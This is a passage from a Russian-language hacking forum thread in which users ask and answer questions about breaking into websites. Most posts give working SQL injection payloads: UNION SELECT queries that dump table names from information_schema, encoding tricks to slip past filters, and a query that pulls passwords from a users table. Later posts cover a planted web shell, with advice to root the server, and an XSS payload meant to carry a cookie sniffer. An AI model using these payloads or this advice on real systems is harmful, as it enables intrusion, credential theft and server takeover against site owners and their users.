Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Спасибо. Но тогда возникает вопрос по проге.
    В ней надо что бы заканчивался запрос на +limit+
    Как это сделать со стандартной скулей?
    UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    тут просто даеш проге так:
    pxxp://site.com/script.php?id=1 UNION SELECT 1,2,<{param}>,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+

    а в поле "Что нужно сдампить" ставиш TABLE_NAME

    воббще если надо сначала тока табли слит быстро то вот так можно:
    pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 --
    выдает все табли разом в хексе
     
    #16042 YuNi|[c, 7 Feb 2011
    Last edited: 7 Feb 2011
    1 person likes this.
  3. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    POST запросы поддерживаются в версии 2.0
    Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась
    https://rdot.org/forum/showthread.php?t=1142

    Добавил версию 2.0 http://forum.antichat.ru/showpost.php?p=2544529&postcount=10
     
    #16043 h00lyshit!, 7 Feb 2011
    Last edited: 7 Feb 2011
    1 person likes this.
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    я не посмотрель что ты выложил, у меня уже был какой то версия.
    Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы
    тут даже попросил кодерам подсказать или наколбасит
    пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки)
    https://forum.antichat.ru/showthread.php?p=2536279
    остался без ответа там
     
  5. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='information_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
     
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://forum.antichat.net/thread104591.html
    Вопрос №2
     
    3 people like this.
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    да Redwood точно указал еще можно так:
    unhex(Hex(cast(Version() as char)))
    cast(Version()+as+binary)
     
  8. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    Redwood, очень благодарен :) cast(concat_ws(0x3a,version(),user(),database())+as+binary) - true
     
  9. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ...

    Все разобрался, это уникальный идентификатор присвоенный скриптом ...
     
    #16049 Lijzer, 7 Feb 2011
    Last edited: 7 Feb 2011
  10. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Вот. Нашел на свой вопрос удобный ответ. Товарищ помог :)
    group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)
    Вдруг кому понадобиться.
     
  11. Ne1c

    Ne1c New Member

    Joined:
    26 Jan 2011
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
    Как это сделать ?
     
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    1) Узнаем имеющиеся БД:
    PHP:
     union select 1,group_concat(schema_namefrom information_schema.schemata+--+
    2) Узнаем таблицы из определенной БД
    PHP:
    select 1,group_concat(table_namefrom information_schema.tables where table_schema='test'
    3) Выводим данные из определенной БД:
    PHP:
     union select 1,password from test.users+--+
     
    #16052 Фараон, 8 Feb 2011
    Last edited: 8 Feb 2011
  13. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    1) Если не известно название БД, то узнать его можно таким запросом
    Code:
    Select table_schema from information_schema.tables where table_name = {Нужный_тебе_столбец}
    2) Если известно, то "переключиться" можно так
    Code:
    Select Нужная_тебе_информация from table_schema.Нужный_тебе_столбец 
    Где table_schema - название необходимой БД
     
    1 person likes this.
  14. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подскажите
    http://databases.about.com/od/security/a/sql_inject_test.htm
    в этой статье говорится

    бла-бла

    у меня тоже такая ошибка вылезла

    но только model=pr11'&(другие параметры)
    пробовал
    не помогает ошибка так и осталась

    каким способом можно еще проверить?
     
  15. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Эта ошибка совсем не является однозначным показателем присутствия скули.
    Также она может получаться, например, при конфликте кодировок (обычно бывает уже непосредственно при выводе)
    В твоем случае я бы поставил, что скули нет.
     
    _________________________
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    покажи что за ошибки выдаёт и при каких запросах

    просто в запросах могут быть например скобки, а ты комментируешь закрывающие. Поэтому я всегда смотрю id=1+and+1=1 или id=1'+and+'1'='1, т.к. работает внезависимости от скобок
     
  17. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    У него лишь 500 ошибка, что бы он не подставлял.
     
    _________________________
  18. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Залил шелл, залажу в корень, в точку монтирования (/mnt), вижу отображение всего, что нужно а вот слить не могу, в чем проблема? или надо делать бекконнект, и рутать серв?
    P/S права на чтение папки есть ...
     
    1 person likes this.
  19. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Прав на файлы м.б. не хватает? Т.е. на папку права есть, а на содержимое ее нет.
    Лучше рутай, если получится.
     
    _________________________
    1 person likes this.
  20. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    как сюда вствить ссылку на мой снифер
    <image src/style=background:url(javascript:alert(/XSS/))>
     
Thread Status:
Not open for further replies.